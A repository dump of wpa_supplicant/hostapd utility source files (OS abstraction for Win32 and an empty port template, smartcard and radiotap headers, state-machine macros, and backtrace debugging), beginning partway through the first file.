* Copyright (c) 2005-2006, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | * 8 | * This file can be used as a starting point when adding a new OS target. The 9 | * functions here do not really work as-is since they are just empty or only 10 | * return an error value. os_internal.c can be used as another starting point 11 | * or reference since it has example implementation of many of these functions. 12 | */ 13 | 14 | #include "includes.h" 15 | 16 | #include "os.h" 17 | 18 | void os_sleep(os_time_t sec, os_time_t usec) 19 | { 20 | } 21 | 22 | 23 | int os_get_time(struct os_time *t) 24 | { 25 | return -1; 26 | } 27 | 28 | 29 | int os_mktime(int year, int month, int day, int hour, int min, int sec, 30 | os_time_t *t) 31 | { 32 | return -1; 33 | } 34 | 35 | int os_gmtime(os_time_t t, struct os_tm *tm) 36 | { 37 | return -1; 38 | } 39 | 40 | 41 | int os_daemonize(const char *pid_file) 42 | { 43 | return -1; 44 | } 45 | 46 | 47 | void os_daemonize_terminate(const char *pid_file) 48 | { 49 | } 50 | 51 | 52 | int os_get_random(unsigned char *buf, size_t len) 53 | { 54 | return -1; 55 | } 56 | 57 | 58 | unsigned long os_random(void) 59 | { 60 | return 0; 61 | } 62 | 63 | 64 | char * os_rel2abs_path(const char *rel_path) 65 | { 66 | return NULL; /* strdup(rel_path) can be used here */ 67 | } 68 | 69 | 70 | int os_program_init(void) 71 | { 72 | return 0; 73 | } 74 | 75 | 76 | void os_program_deinit(void) 77 | { 78 | } 79 | 80 | 81 | int os_setenv(const char *name, const char *value, int overwrite) 82 | { 83 | return -1; 84 | } 85 | 86 | 87 | int os_unsetenv(const char *name) 88 | { 89 | return -1; 90 | } 91 | 92 | 93 | char * os_readfile(const char *name, size_t *len) 94 | { 95 | return NULL; 96 | } 97 | 98 | 99 | void * os_zalloc(size_t size) 100 | { 101 | return NULL; 102 | } 103 | 104 | 105 | #ifdef OS_NO_C_LIB_DEFINES 106 | void * os_malloc(size_t size) 107 | { 108 | return NULL; 109 | } 110 | 111 | 112 | void * os_realloc(void *ptr, size_t size) 113 | { 114 | return NULL; 115 | } 116 | 117 | 118 | void os_free(void *ptr) 119 | { 120 | } 121 | 122 | 123 | void * os_memcpy(void *dest, const void *src, size_t n) 124 | { 125 | return dest; 126 | } 127 | 128 | 129 | void * os_memmove(void *dest, const void *src, size_t n) 130 | { 131 | return dest; 132 | } 133 | 134 | 135 | void * os_memset(void *s, int c, size_t n) 136 | { 137 | return s; 138 | } 139 | 140 | 141 | int os_memcmp(const void *s1, const void *s2, size_t n) 142 | { 143 | return 0; 144 | } 145 | 146 | 147 | char * os_strdup(const char *s) 148 | { 149 | return NULL; 150 | } 151 | 152 | 153 | size_t os_strlen(const char *s) 154 | { 155 | return 0; 156 | } 157 | 158 | 159 | int os_strcasecmp(const char *s1, const char *s2) 160 | { 161 | /* 162 | * Ignoring case is not required for main functionality, so just use 163 | * the case sensitive version of the function. 164 | */ 165 | return os_strcmp(s1, s2); 166 | } 167 | 168 | 169 | int os_strncasecmp(const char *s1, const char *s2, size_t n) 170 | { 171 | /* 172 | * Ignoring case is not required for main functionality, so just use 173 | * the case sensitive version of the function. 174 | */ 175 | return os_strncmp(s1, s2, n); 176 | } 177 | 178 | 179 | char * os_strchr(const char *s, int c) 180 | { 181 | return NULL; 182 | } 183 | 184 | 185 | char * os_strrchr(const char *s, int c) 186 | { 187 | return NULL; 188 | } 189 | 190 | 191 | int os_strcmp(const char *s1, const char *s2) 192 | { 193 | return 0; 194 | } 195 | 196 | 197 | int os_strncmp(const char *s1, const char *s2, size_t n) 198 | { 199 | return 0; 200 | } 201 | 202 | 203 | char * os_strncpy(char *dest, const char *src, size_t n) 204 | { 205 | return dest; 206 | } 207 | 208 | 209 | size_t os_strlcpy(char *dest, const char *src, size_t size) 210 | { 211 | return 0; 212 | } 213 | 214 | 215 | char * os_strstr(const char *haystack, const char *needle) 216 | { 217 | return NULL; 218 | } 219 | 220 | 221 | int os_snprintf(char *str, size_t size, const char *format, ...) 222 | { 223 | return 0; 224 | } 225 | #endif /* OS_NO_C_LIB_DEFINES */ 226 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/utils/os_win32.c: -------------------------------------------------------------------------------- 1 | /* 2 | * wpa_supplicant/hostapd / OS specific functions for Win32 systems 3 | * Copyright (c) 2005-2006, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | */ 8 | 9 | #include "includes.h" 10 | #include 11 | #include 12 | #include 13 | 14 | #include "os.h" 15 | 16 | void os_sleep(os_time_t sec, os_time_t usec) 17 | { 18 | if (sec) 19 | Sleep(sec * 1000); 20 | if (usec) 21 | Sleep(usec / 1000); 22 | } 23 | 24 | 25 | int os_get_time(struct os_time *t) 26 | { 27 | #define EPOCHFILETIME (116444736000000000ULL) 28 | FILETIME ft; 29 | LARGE_INTEGER li; 30 | ULONGLONG tt; 31 | 32 | #ifdef _WIN32_WCE 33 | SYSTEMTIME st; 34 | 35 | GetSystemTime(&st); 36 | SystemTimeToFileTime(&st, &ft); 37 | #else /* _WIN32_WCE */ 38 | GetSystemTimeAsFileTime(&ft); 39 | #endif /* _WIN32_WCE */ 40 | li.LowPart = ft.dwLowDateTime; 41 | li.HighPart = ft.dwHighDateTime; 42 | tt = (li.QuadPart - EPOCHFILETIME) / 10; 43 | t->sec = (os_time_t) (tt / 1000000); 44 | t->usec = (os_time_t) (tt % 1000000); 45 | 46 | return 0; 47 | } 48 | 49 | 50 | int os_mktime(int year, int month, int day, int hour, int min, int sec, 51 | os_time_t *t) 52 | { 53 | struct tm tm, *tm1; 54 | time_t t_local, t1, t2; 55 | os_time_t tz_offset; 56 | 57 | if (year < 1970 || month < 1 || month > 12 || day < 1 || day > 31 || 58 | hour < 0 || hour > 23 || min < 0 || min > 59 || sec < 0 || 59 | sec > 60) 60 | return -1; 61 | 62 | memset(&tm, 0, sizeof(tm)); 63 | tm.tm_year = year - 1900; 64 | tm.tm_mon = month - 1; 65 | tm.tm_mday = day; 66 | tm.tm_hour = hour; 67 | tm.tm_min = min; 68 | tm.tm_sec = sec; 69 | 70 | t_local = mktime(&tm); 71 | 72 | /* figure out offset to UTC */ 73 | tm1 = localtime(&t_local); 74 | if (tm1) { 75 | t1 = mktime(tm1); 76 | tm1 = gmtime(&t_local); 77 | if (tm1) { 78 | t2 = mktime(tm1); 79 | tz_offset = t2 - t1; 80 | } else 81 | tz_offset = 0; 82 | } else 83 | tz_offset = 0; 84 | 85 | *t = (os_time_t) t_local - tz_offset; 86 | return 0; 87 | } 88 | 89 | 90 | int os_gmtime(os_time_t t, struct os_tm *tm) 91 | { 92 | struct tm *tm2; 93 | time_t t2 = t; 94 | 95 | tm2 = gmtime(&t2); 96 | if (tm2 == NULL) 97 | return -1; 98 | tm->sec = tm2->tm_sec; 99 | tm->min = tm2->tm_min; 100 | tm->hour = tm2->tm_hour; 101 | tm->day = tm2->tm_mday; 102 | tm->month = tm2->tm_mon + 1; 103 | tm->year = tm2->tm_year + 1900; 104 | return 0; 105 | } 106 | 107 | 108 | int os_daemonize(const char *pid_file) 109 | { 110 | /* TODO */ 111 | return -1; 112 | } 113 | 114 | 115 | void os_daemonize_terminate(const char *pid_file) 116 | { 117 | } 118 | 119 | 120 | int os_get_random(unsigned char *buf, size_t len) 121 | { 122 | HCRYPTPROV prov; 123 | BOOL ret; 124 | 125 | if (!CryptAcquireContext(&prov, NULL, NULL, PROV_RSA_FULL, 126 | CRYPT_VERIFYCONTEXT)) 127 | return -1; 128 | 129 | ret = CryptGenRandom(prov, len, buf); 130 | CryptReleaseContext(prov, 0); 131 | 132 | return ret ? 0 : -1; 133 | } 134 | 135 | 136 | unsigned long os_random(void) 137 | { 138 | return rand(); 139 | } 140 | 141 | 142 | char * os_rel2abs_path(const char *rel_path) 143 | { 144 | return _strdup(rel_path); 145 | } 146 | 147 | 148 | int os_program_init(void) 149 | { 150 | #ifdef CONFIG_NATIVE_WINDOWS 151 | WSADATA wsaData; 152 | if (WSAStartup(MAKEWORD(2, 0), &wsaData)) { 153 | printf("Could not find a usable WinSock.dll\n"); 154 | return -1; 155 | } 156 | #endif /* CONFIG_NATIVE_WINDOWS */ 157 | return 0; 158 | } 159 | 160 | 161 | void os_program_deinit(void) 162 | { 163 | #ifdef CONFIG_NATIVE_WINDOWS 164 | WSACleanup(); 165 | #endif /* CONFIG_NATIVE_WINDOWS */ 166 | } 167 | 168 | 169 | int os_setenv(const char *name, const char *value, int overwrite) 170 | { 171 | return -1; 172 | } 173 | 174 | 175 | int os_unsetenv(const char *name) 176 | { 177 | return -1; 178 | } 179 | 180 | 181 | char * os_readfile(const char *name, size_t *len) 182 | { 183 | FILE *f; 184 | char *buf; 185 | 186 | f = fopen(name, "rb"); 187 | if (f == NULL) 188 | return NULL; 189 | 190 | fseek(f, 0, SEEK_END); 191 | *len = ftell(f); 192 | fseek(f, 0, SEEK_SET); 193 | 194 | buf = malloc(*len); 195 | if (buf == NULL) { 196 | fclose(f); 197 | return NULL; 198 | } 199 | 200 | fread(buf, 1, *len, f); 201 | fclose(f); 202 | 203 | return buf; 204 | } 205 | 206 | 207 | void * os_zalloc(size_t size) 208 | { 209 | return calloc(1, size); 210 | } 211 | 212 | 213 | size_t os_strlcpy(char *dest, const char *src, size_t siz) 214 | { 215 | const char *s = src; 216 | size_t left = siz; 217 | 218 | if (left) { 219 | /* Copy string up to the maximum size of the dest buffer */ 220 | while (--left != 0) { 221 | if ((*dest++ = *s++) == '\0') 222 | break; 223 | } 224 | } 225 | 226 | if (left == 0) { 227 | /* Not enough room for the string; force NUL-termination */ 228 | if (siz != 0) 229 | *dest = '\0'; 230 | while (*s++) 231 | ; /* determine total src string length */ 232 | } 233 | 234 | return s - src - 1; 235 | } 236 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/utils/pcsc_funcs.h: -------------------------------------------------------------------------------- 1 | /* 2 | * WPA Supplicant / PC/SC smartcard interface for USIM, GSM SIM 3 | * Copyright (c) 2004-2006, 2012, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | */ 8 | 9 | #ifndef PCSC_FUNCS_H 10 | #define PCSC_FUNCS_H 11 | 12 | typedef enum { 13 | SCARD_GSM_SIM_ONLY, 14 | SCARD_USIM_ONLY, 15 | SCARD_TRY_BOTH 16 | } scard_sim_type; 17 | 18 | 19 | #ifdef PCSC_FUNCS 20 | struct scard_data * scard_init(scard_sim_type sim_type, const char *reader); 21 | void scard_deinit(struct scard_data *scard); 22 | 23 | int scard_set_pin(struct scard_data *scard, const char *pin); 24 | int scard_get_imsi(struct scard_data *scard, char *imsi, size_t *len); 25 | int scard_get_mnc_len(struct scard_data *scard); 26 | int scard_gsm_auth(struct scard_data *scard, const unsigned char *_rand, 27 | unsigned char *sres, unsigned char *kc); 28 | int scard_umts_auth(struct scard_data *scard, const unsigned char *_rand, 29 | const unsigned char *autn, 30 | unsigned char *res, size_t *res_len, 31 | unsigned char *ik, unsigned char *ck, unsigned char *auts); 32 | int scard_get_pin_retry_counter(struct scard_data *scard); 33 | int scard_supports_umts(struct scard_data *scard); 34 | 35 | #else /* PCSC_FUNCS */ 36 | 37 | #define scard_init(s, r) NULL 38 | #define scard_deinit(s) do { } while (0) 39 | #define scard_set_pin(s, p) -1 40 | #define scard_get_imsi(s, i, l) -1 41 | #define scard_get_mnc_len(s) -1 42 | #define scard_gsm_auth(s, r, s2, k) -1 43 | #define scard_umts_auth(s, r, a, r2, rl, i, c, a2) -1 44 | #define scard_get_pin_retry_counter(s) -1 45 | #define scard_supports_umts(s) 0 46 | 47 | #endif /* PCSC_FUNCS */ 48 | 49 | #endif /* PCSC_FUNCS_H */ 50 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/utils/radiotap_iter.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Radiotap parser 3 | * 4 | * Copyright 2007 Andy Green 5 | * 6 | * This program is free software; you can redistribute it and/or modify 7 | * it under the terms of the GNU General Public License version 2 as 8 | * published by the Free Software Foundation. 9 | * 10 | * Alternatively, this software may be distributed under the terms of BSD 11 | * license. 12 | * 13 | * See README and COPYING for more details. 14 | */ 15 | 16 | #ifndef __RADIOTAP_ITER_H 17 | #define __RADIOTAP_ITER_H 18 | 19 | #include "radiotap.h" 20 | 21 | /* Radiotap header iteration 22 | * implemented in radiotap.c 23 | */ 24 | /** 25 | * struct ieee80211_radiotap_iterator - tracks walk thru present radiotap args 26 | * @rtheader: pointer to the radiotap header we are walking through 27 | * @max_length: length of radiotap header in cpu byte ordering 28 | * @this_arg_index: IEEE80211_RADIOTAP_... index of current arg 29 | * @this_arg: pointer to current radiotap arg 30 | * @arg_index: internal next argument index 31 | * @arg: internal next argument pointer 32 | * @next_bitmap: internal pointer to next present u32 33 | * @bitmap_shifter: internal shifter for curr u32 bitmap, b0 set == arg present 34 | */ 35 | 36 | struct ieee80211_radiotap_iterator { 37 | struct ieee80211_radiotap_header *rtheader; 38 | int max_length; 39 | int this_arg_index; 40 | unsigned char *this_arg; 41 | 42 | int arg_index; 43 | unsigned char *arg; 44 | uint32_t *next_bitmap; 45 | uint32_t bitmap_shifter; 46 | }; 47 | 48 | extern int ieee80211_radiotap_iterator_init( 49 | struct ieee80211_radiotap_iterator *iterator, 50 | struct ieee80211_radiotap_header *radiotap_header, 51 | int max_length); 52 | 53 | extern int ieee80211_radiotap_iterator_next( 54 | struct ieee80211_radiotap_iterator *iterator); 55 | 56 | #endif /* __RADIOTAP_ITER_H */ 57 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/utils/state_machine.h: -------------------------------------------------------------------------------- 1 | /* 2 | * wpa_supplicant/hostapd - State machine definitions 3 | * Copyright (c) 2002-2005, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | * 8 | * This file includes a set of pre-processor macros that can be used to 9 | * implement a state machine. In addition to including this header file, each 10 | * file implementing a state machine must define STATE_MACHINE_DATA to be the 11 | * data structure including state variables (enum machine_state, 12 | * Boolean changed), and STATE_MACHINE_DEBUG_PREFIX to be a string that is used 13 | * as a prefix for all debug messages. If SM_ENTRY_MA macro is used to define 14 | * a group of state machines with shared data structure, STATE_MACHINE_ADDR 15 | * needs to be defined to point to the MAC address used in debug output. 16 | * SM_ENTRY_M macro can be used to define similar group of state machines 17 | * without this additional debug info. 18 | */ 19 | 20 | #ifndef STATE_MACHINE_H 21 | #define STATE_MACHINE_H 22 | 23 | /** 24 | * SM_STATE - Declaration of a state machine function 25 | * @machine: State machine name 26 | * @state: State machine state 27 | * 28 | * This macro is used to declare a state machine function. It is used in place 29 | * of a C function definition to declare functions to be run when the state is 30 | * entered by calling SM_ENTER or SM_ENTER_GLOBAL. 31 | */ 32 | #define SM_STATE(machine, state) \ 33 | static void sm_ ## machine ## _ ## state ## _Enter(STATE_MACHINE_DATA *sm, \ 34 | int global) 35 | 36 | /** 37 | * SM_ENTRY - State machine function entry point 38 | * @machine: State machine name 39 | * @state: State machine state 40 | * 41 | * This macro is used inside each state machine function declared with 42 | * SM_STATE. SM_ENTRY should be in the beginning of the function body, but 43 | * after declaration of possible local variables. This macro prints debug 44 | * information about state transition and update the state machine state. 45 | */ 46 | #define SM_ENTRY(machine, state) \ 47 | if (!global || sm->machine ## _state != machine ## _ ## state) { \ 48 | sm->changed = TRUE; \ 49 | wpa_printf(MSG_DEBUG, STATE_MACHINE_DEBUG_PREFIX ": " #machine \ 50 | " entering state " #state); \ 51 | } \ 52 | sm->machine ## _state = machine ## _ ## state; 53 | 54 | /** 55 | * SM_ENTRY_M - State machine function entry point for state machine group 56 | * @machine: State machine name 57 | * @_state: State machine state 58 | * @data: State variable prefix (full variable: prefix_state) 59 | * 60 | * This macro is like SM_ENTRY, but for state machine groups that use a shared 61 | * data structure for more than one state machine. Both machine and prefix 62 | * parameters are set to "sub-state machine" name. prefix is used to allow more 63 | * than one state variable to be stored in the same data structure. 64 | */ 65 | #define SM_ENTRY_M(machine, _state, data) \ 66 | if (!global || sm->data ## _ ## state != machine ## _ ## _state) { \ 67 | sm->changed = TRUE; \ 68 | wpa_printf(MSG_DEBUG, STATE_MACHINE_DEBUG_PREFIX ": " \ 69 | #machine " entering state " #_state); \ 70 | } \ 71 | sm->data ## _ ## state = machine ## _ ## _state; 72 | 73 | /** 74 | * SM_ENTRY_MA - State machine function entry point for state machine group 75 | * @machine: State machine name 76 | * @_state: State machine state 77 | * @data: State variable prefix (full variable: prefix_state) 78 | * 79 | * This macro is like SM_ENTRY_M, but a MAC address is included in debug 80 | * output. STATE_MACHINE_ADDR has to be defined to point to the MAC address to 81 | * be included in debug. 82 | */ 83 | #define SM_ENTRY_MA(machine, _state, data) \ 84 | if (!global || sm->data ## _ ## state != machine ## _ ## _state) { \ 85 | sm->changed = TRUE; \ 86 | wpa_printf(MSG_DEBUG, STATE_MACHINE_DEBUG_PREFIX ": " MACSTR " " \ 87 | #machine " entering state " #_state, \ 88 | MAC2STR(STATE_MACHINE_ADDR)); \ 89 | } \ 90 | sm->data ## _ ## state = machine ## _ ## _state; 91 | 92 | /** 93 | * SM_ENTER - Enter a new state machine state 94 | * @machine: State machine name 95 | * @state: State machine state 96 | * 97 | * This macro expands to a function call to a state machine function defined 98 | * with SM_STATE macro. SM_ENTER is used in a state machine step function to 99 | * move the state machine to a new state. 100 | */ 101 | #define SM_ENTER(machine, state) \ 102 | sm_ ## machine ## _ ## state ## _Enter(sm, 0) 103 | 104 | /** 105 | * SM_ENTER_GLOBAL - Enter a new state machine state based on global rule 106 | * @machine: State machine name 107 | * @state: State machine state 108 | * 109 | * This macro is like SM_ENTER, but this is used when entering a new state 110 | * based on a global (not specific to any particular state) rule. A separate 111 | * macro is used to avoid unwanted debug message floods when the same global 112 | * rule is forcing a state machine to remain in on state. 113 | */ 114 | #define SM_ENTER_GLOBAL(machine, state) \ 115 | sm_ ## machine ## _ ## state ## _Enter(sm, 1) 116 | 117 | /** 118 | * SM_STEP - Declaration of a state machine step function 119 | * @machine: State machine name 120 | * 121 | * This macro is used to declare a state machine step function. It is used in 122 | * place of a C function definition to declare a function that is used to move 123 | * state machine to a new state based on state variables. This function uses 124 | * SM_ENTER and SM_ENTER_GLOBAL macros to enter new state. 125 | */ 126 | #define SM_STEP(machine) \ 127 | static void sm_ ## machine ## _Step(STATE_MACHINE_DATA *sm) 128 | 129 | /** 130 | * SM_STEP_RUN - Call the state machine step function 131 | * @machine: State machine name 132 | * 133 | * This macro expands to a function call to a state machine step function 134 | * defined with SM_STEP macro. 135 | */ 136 | #define SM_STEP_RUN(machine) sm_ ## machine ## _Step(sm) 137 | 138 | #endif /* STATE_MACHINE_H */ 139 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/utils/trace.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Backtrace debugging 3 | * Copyright (c) 2009, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | */ 8 | 9 | #include "includes.h" 10 | 11 | #include "common.h" 12 | #include "trace.h" 13 | 14 | #ifdef WPA_TRACE 15 | 16 | static struct dl_list active_references = 17 | { &active_references, &active_references }; 18 | 19 | #ifdef WPA_TRACE_BFD 20 | #include 21 | #ifdef __linux__ 22 | #include 23 | #else /* __linux__ */ 24 | #include 25 | #endif /* __linux__ */ 26 | 27 | static char *prg_fname = NULL; 28 | static bfd *cached_abfd = NULL; 29 | static asymbol **syms = NULL; 30 | 31 | static void get_prg_fname(void) 32 | { 33 | char exe[50], fname[512]; 34 | int len; 35 | os_snprintf(exe, sizeof(exe) - 1, "/proc/%u/exe", getpid()); 36 | len = readlink(exe, fname, sizeof(fname) - 1); 37 | if (len < 0 || len >= (int) sizeof(fname)) { 38 | perror("readlink"); 39 | return; 40 | } 41 | fname[len] = '\0'; 42 | prg_fname = strdup(fname); 43 | } 44 | 45 | 46 | static bfd * open_bfd(const char *fname) 47 | { 48 | bfd *abfd; 49 | char **matching; 50 | 51 | abfd = bfd_openr(prg_fname, NULL); 52 | if (abfd == NULL) { 53 | wpa_printf(MSG_INFO, "bfd_openr failed"); 54 | return NULL; 55 | } 56 | 57 | if (bfd_check_format(abfd, bfd_archive)) { 58 | wpa_printf(MSG_INFO, "bfd_check_format failed"); 59 | bfd_close(abfd); 60 | return NULL; 61 | } 62 | 63 | if (!bfd_check_format_matches(abfd, bfd_object, &matching)) { 64 | wpa_printf(MSG_INFO, "bfd_check_format_matches failed"); 65 | free(matching); 66 | bfd_close(abfd); 67 | return NULL; 68 | } 69 | 70 | return abfd; 71 | } 72 | 73 | 74 | static void read_syms(bfd *abfd) 75 | { 76 | long storage, symcount; 77 | bfd_boolean dynamic = FALSE; 78 | 79 | if (syms) 80 | return; 81 | 82 | if (!(bfd_get_file_flags(abfd) & HAS_SYMS)) { 83 | wpa_printf(MSG_INFO, "No symbols"); 84 | return; 85 | } 86 | 87 | storage = bfd_get_symtab_upper_bound(abfd); 88 | if (storage == 0) { 89 | storage = bfd_get_dynamic_symtab_upper_bound(abfd); 90 | dynamic = TRUE; 91 | } 92 | if (storage < 0) { 93 | wpa_printf(MSG_INFO, "Unknown symtab upper bound"); 94 | return; 95 | } 96 | 97 | syms = malloc(storage); 98 | if (syms == NULL) { 99 | wpa_printf(MSG_INFO, "Failed to allocate memory for symtab " 100 | "(%ld bytes)", storage); 101 | return; 102 | } 103 | if (dynamic) 104 | symcount = bfd_canonicalize_dynamic_symtab(abfd, syms); 105 | else 106 | symcount = bfd_canonicalize_symtab(abfd, syms); 107 | if (symcount < 0) { 108 | wpa_printf(MSG_INFO, "Failed to canonicalize %ssymtab", 109 | dynamic ? "dynamic " : ""); 110 | free(syms); 111 | syms = NULL; 112 | return; 113 | } 114 | } 115 | 116 | 117 | struct bfd_data { 118 | bfd_vma pc; 119 | bfd_boolean found; 120 | const char *filename; 121 | const char *function; 122 | unsigned int line; 123 | }; 124 | 125 | 126 | static void find_addr_sect(bfd *abfd, asection *section, void *obj) 127 | { 128 | struct bfd_data *data = obj; 129 | bfd_vma vma; 130 | bfd_size_type size; 131 | 132 | if (data->found) 133 | return; 134 | 135 | if (!(bfd_get_section_vma(abfd, section))) 136 | return; 137 | 138 | vma = bfd_get_section_vma(abfd, section); 139 | if (data->pc < vma) 140 | return; 141 | 142 | size = bfd_get_section_size(section); 143 | if (data->pc >= vma + size) 144 | return; 145 | 146 | data->found = bfd_find_nearest_line(abfd, section, syms, 147 | data->pc - vma, 148 | &data->filename, 149 | &data->function, 150 | &data->line); 151 | } 152 | 153 | 154 | static void wpa_trace_bfd_addr(void *pc) 155 | { 156 | bfd *abfd = cached_abfd; 157 | struct bfd_data data; 158 | const char *name; 159 | char *aname = NULL; 160 | const char *filename; 161 | 162 | if (abfd == NULL) 163 | return; 164 | 165 | data.pc = (bfd_vma) pc; 166 | data.found = FALSE; 167 | bfd_map_over_sections(abfd, find_addr_sect, &data); 168 | 169 | if (!data.found) 170 | return; 171 | 172 | do { 173 | if (data.function) 174 | aname = bfd_demangle(abfd, data.function, 175 | DMGL_ANSI | DMGL_PARAMS); 176 | name = aname ? aname : data.function; 177 | filename = data.filename; 178 | if (filename) { 179 | char *end = os_strrchr(filename, '/'); 180 | int i = 0; 181 | while (*filename && *filename == prg_fname[i] && 182 | filename <= end) { 183 | filename++; 184 | i++; 185 | } 186 | } 187 | wpa_printf(MSG_INFO, " %s() %s:%u", 188 | name, filename, data.line); 189 | free(aname); 190 | 191 | data.found = bfd_find_inliner_info(abfd, &data.filename, 192 | &data.function, &data.line); 193 | } while (data.found); 194 | } 195 | 196 | 197 | static const char * wpa_trace_bfd_addr2func(void *pc) 198 | { 199 | bfd *abfd = cached_abfd; 200 | struct bfd_data data; 201 | 202 | if (abfd == NULL) 203 | return NULL; 204 | 205 | data.pc = (bfd_vma) pc; 206 | data.found = FALSE; 207 | bfd_map_over_sections(abfd, find_addr_sect, &data); 208 | 209 | if (!data.found) 210 | return NULL; 211 | 212 | return data.function; 213 | } 214 | 215 | 216 | static void wpa_trace_bfd_init(void) 217 | { 218 | if (!prg_fname) { 219 | get_prg_fname(); 220 | if (!prg_fname) 221 | return; 222 | } 223 | 224 | if (!cached_abfd) { 225 | cached_abfd = open_bfd(prg_fname); 226 | if (!cached_abfd) { 227 | wpa_printf(MSG_INFO, "Failed to open bfd"); 228 | return; 229 | } 230 | } 231 | 232 | read_syms(cached_abfd); 233 | if (!syms) { 234 | wpa_printf(MSG_INFO, "Failed to read symbols"); 235 | return; 236 | } 237 | } 238 | 239 | 240 | void wpa_trace_dump_funcname(const char *title, void *pc) 241 | { 242 | wpa_printf(MSG_INFO, "WPA_TRACE: %s: %p", title, pc); 243 | wpa_trace_bfd_init(); 244 | wpa_trace_bfd_addr(pc); 245 | } 246 | 247 | #else /* WPA_TRACE_BFD */ 248 | 249 | #define wpa_trace_bfd_init() do { } while (0) 250 | #define wpa_trace_bfd_addr(pc) do { } while (0) 251 | #define wpa_trace_bfd_addr2func(pc) NULL 252 | 253 | #endif /* WPA_TRACE_BFD */ 254 | 255 | void wpa_trace_dump_func(const char *title, void **btrace, int btrace_num) 256 | { 257 | char **sym; 258 | int i; 259 | enum { TRACE_HEAD, TRACE_RELEVANT, TRACE_TAIL } state; 260 | 261 | wpa_trace_bfd_init(); 262 | wpa_printf(MSG_INFO, "WPA_TRACE: %s - START", title); 263 | sym = backtrace_symbols(btrace, btrace_num); 264 | state = TRACE_HEAD; 265 | for (i = 0; i < btrace_num; i++) { 266 | const char *func = wpa_trace_bfd_addr2func(btrace[i]); 267 | if (state == TRACE_HEAD && func && 268 | (os_strcmp(func, "wpa_trace_add_ref_func") == 0 || 269 | os_strcmp(func, "wpa_trace_check_ref") == 0 || 270 | os_strcmp(func, "wpa_trace_show") == 0)) 271 | continue; 272 | if (state == TRACE_TAIL && sym && sym[i] && 273 | os_strstr(sym[i], "__libc_start_main")) 274 | break; 275 | if (state == TRACE_HEAD) 276 | state = TRACE_RELEVANT; 277 | if (sym) 278 | wpa_printf(MSG_INFO, "[%d]: %s", i, sym[i]); 279 | else 280 | wpa_printf(MSG_INFO, "[%d]: ?? [%p]", i, btrace[i]); 281 | wpa_trace_bfd_addr(btrace[i]); 282 | if (state == TRACE_RELEVANT && func && 283 | os_strcmp(func, "main") == 0) 284 | state = TRACE_TAIL; 285 | } 286 | free(sym); 287 | wpa_printf(MSG_INFO, "WPA_TRACE: %s - END", title); 288 | } 289 | 290 | 291 | void wpa_trace_show(const char *title) 292 | { 293 | struct info { 294 | WPA_TRACE_INFO 295 | } info; 296 | wpa_trace_record(&info); 297 | wpa_trace_dump(title, &info); 298 | } 299 | 300 | 301 | void wpa_trace_add_ref_func(struct wpa_trace_ref *ref, const void *addr) 302 | { 303 | if (addr == NULL) 304 | return; 305 | ref->addr = addr; 306 | wpa_trace_record(ref); 307 | dl_list_add(&active_references, &ref->list); 308 | } 309 | 310 | 311 | void wpa_trace_check_ref(const void *addr) 312 | { 313 | struct wpa_trace_ref *ref; 314 | dl_list_for_each(ref, &active_references, struct wpa_trace_ref, list) { 315 | if (addr != ref->addr) 316 | continue; 317 | wpa_trace_show("Freeing referenced memory"); 318 | wpa_trace_dump("Reference registration", ref); 319 | abort(); 320 | } 321 | } 322 | 323 | #endif /* WPA_TRACE */ 324 | -------------------------------------------------------------------------------- /module/Auto_EAP/src/utils/trace.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Backtrace debugging 3 | * Copyright (c) 2009, Jouni Malinen 4 | * 5 | * This software may be distributed under the terms of the BSD license. 6 | * See README for more details. 7 | */ 8 | 9 | #ifndef TRACE_H 10 | #define TRACE_H 11 | 12 | #define WPA_TRACE_LEN 16 13 | 14 | #ifdef WPA_TRACE 15 | #include 16 | 17 | #include "list.h" 18 | 19 | #define WPA_TRACE_INFO void *btrace[WPA_TRACE_LEN]; int btrace_num; 20 | 21 | struct wpa_trace_ref { 22 | struct dl_list list; 23 | const void *addr; 24 | WPA_TRACE_INFO 25 | }; 26 | #define WPA_TRACE_REF(name) struct wpa_trace_ref wpa_trace_ref_##name 27 | 28 | #define wpa_trace_dump(title, ptr) \ 29 | wpa_trace_dump_func((title), (ptr)->btrace, (ptr)->btrace_num) 30 | void wpa_trace_dump_func(const char *title, void **btrace, int btrace_num); 31 | #define wpa_trace_record(ptr) \ 32 | (ptr)->btrace_num = backtrace((ptr)->btrace, WPA_TRACE_LEN) 33 | void wpa_trace_show(const char *title); 34 | #define wpa_trace_add_ref(ptr, name, addr) \ 35 | wpa_trace_add_ref_func(&(ptr)->wpa_trace_ref_##name, (addr)) 36 | void wpa_trace_add_ref_func(struct wpa_trace_ref *ref, const void *addr); 37 | #define wpa_trace_remove_ref(ptr, name, addr) \ 38 | do { \ 39 | if ((addr)) \ 40 | dl_list_del(&(ptr)->wpa_trace_ref_##name.list); \ 41 | } while (0) 42 | void wpa_trace_check_ref(const void *addr); 43 | 44 | #else /* WPA_TRACE */ 45 | 46 | #define WPA_TRACE_INFO 47 | #define WPA_TRACE_REF(n) 48 | #define wpa_trace_dump(title, ptr) do { } while (0) 49 | #define wpa_trace_record(ptr) do { } while (0) 50 | #define wpa_trace_show(title) do { } while (0) 51 | #define wpa_trace_add_ref(ptr, name, addr) do { } while (0) 52 | #define wpa_trace_remove_ref(ptr, name, addr) do { } while (0) 53 | #define wpa_trace_check_ref(addr) do { } while (0) 54 | 55 | #endif /* WPA_TRACE */ 56 | 57 | 58 | #ifdef WPA_TRACE_BFD 59 | 60 | void wpa_trace_dump_funcname(const char *title, void *pc); 61 | 62 | #else /* WPA_TRACE_BFD */ 63 | 64 | #define wpa_trace_dump_funcname(title, pc) do { } while (0) 65 | 66 | #endif /* WPA_TRACE_BFD */ 67 | 68 | 